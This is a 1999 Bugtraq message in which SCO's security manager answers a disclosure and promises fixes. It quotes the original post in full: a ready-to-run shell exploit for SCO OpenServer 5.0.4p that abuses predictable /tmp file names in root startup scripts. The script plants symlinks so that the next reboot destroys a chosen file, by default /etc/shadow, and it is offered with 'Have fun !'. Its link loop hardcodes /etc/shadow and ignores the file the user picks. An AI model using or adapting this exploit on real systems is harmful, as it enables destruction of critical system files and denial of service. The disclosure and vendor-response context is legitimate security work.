[9830] in bugtraq
Re: Little exploit for startup scripts (SCO 5.0.4p).
daemon@ATHENA.MIT.EDU (Jon Coyle)
Mon Mar 8 12:24:29 1999
Date: Mon, 8 Mar 1999 11:58:54 -0000
Reply-To: jonco@SCO.com
From: Jon Coyle <jonco@SCO.COM>
X-To: leshka <leshka@leshka.chuvashia.su>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <AAxlcusyk3@leshka.chuvashia.su>
Leshka,
We have started work on this and are checking all of our OS
products to see if they suffer from similar problems. We will
make information available at our security pages http://www.sco.com/security)
on how to work around the
problem, and will also have fixes available in a few days.
Thanks,
Jon
> -----Original Message-----
> From: Bugtraq List [mailto:BUGTRAQ@netspace.org]On Behalf Of leshka
> Sent: 07 March 1999 12:07
> To: BUGTRAQ@netspace.org
> Subject: Little exploit for startup scripts (SCO 5.0.4p).
>
>
> #!/bin/sh
> #
> # ... The punishment for inobedience ...
> # (Cycle # 2)
> #
> # This simple script can help to erase any file
> # (SCO OpenServer Enterprise System v 5.0.4p).
> # Have fun !
> #
> #
> #
> #
> # Some of "/etc/rc2.d" startup scripts create and then delete
> temporary files
> # with easily predictable names in "/tmp" directory. Below
> there is a few
> # interesting fragments of those nice scripts:
> #
> # S84rpcinit:
> # ...
> # /bin/su root -c "/bin/ps -ef" > /tmp/rpc$$ 2>/tmp/rpc.err$$
> # /bin/rm -f /tmp/rpc.err$$
> # ...
> # rm -rf /tmp/rpc$$
> #
> # S95nis:
> # ...
> # /bin/su root -c "/bin/ps -ef" > /tmp/nis$$ 2>/tmp/nis.err$$
> # /bin/rm -f /tmp/nis.err$$
> # ...
> # rm -f /tmp/nis$$
> #
> # S85tcp:
> # ...
> # /bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$
> # /bin/rm -f /tmp/ps.err$$
> # ...
> # /bin/rm -f /tmp/tps$$
> #
> # S89nfs:
> # ...
> # /bin/su root -c "/bin/ps -ef" > /tmp/nfs$$ 2>/tmp/nfs.err$$
> # /bin/rm -f /tmp/nfs.err$$
> # ...
> # rm -f /tmp/nfs$$
> #
> # Every time during the startup such shell scripts creates files with names
> # that include a process number of the above shell script. My numerous tests
> # showed that the number is always the same with every reboot. Pretty good,
> # isn't it? One problem: how to determine the process number of such script?
> # It's so simple! Child processes of this script have PID's with values
> # slightly over than the parent's PID. A little math and one gets it. Next
> # step is creating a few symbolic links to the victime file in the "/tmp"
> # directory. During the next startup the victim file will be destroyed.
> #
> # P.S. Looking forward to getting published a complete SCO's list of names
> # of such perfect shell scripts.
> #
> # 999,99*2
> #
> # ----------------------
> # ---------------------------------------------
> # ----------------- Dedicated to my beautiful lady
> ------------------
> # ---------------------------------------------
> # ----------------------
> #
> # Leshka Zakharoff, 1999. E-mail: leshka@leshka.chuvashia.su (.ru)
> #
> #
> #
> if [ _$1 = "_" ]
> then
> {
> echo -n "File to delete [/etc/shadow]:"
> read victim_file
> if [ _$victim_file = "_" ]
> then
> victim_file="/etc/shadow"
> fi
> }
> else
> victim_file=$1
> fi
> pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf $2 }'`
> lastpid=`expr $pid - 30`
> while [ $pid != $lastpid ]
> do
> pid=`expr $pid - 1`;ln -fs /etc/shadow /tmp/tps$pid
> done
> echo Done ! File \"$victim_file\" will be destroyed after the next reboot.
>
----
Jon Coyle - Manager, Internet Engineering & Secure Technologies
jonco@sco.com SCO Ltd.
Tel : +44 1923 813656 Croxley Business Park
Fax: +44 1923 813804 Hatters Lane
http://www.sco.com Watford, WD1 8YN, UK
Fingerprint: F44A 677A 4920 02AC C655 D419 B9B7 46B0 A951 6FF7
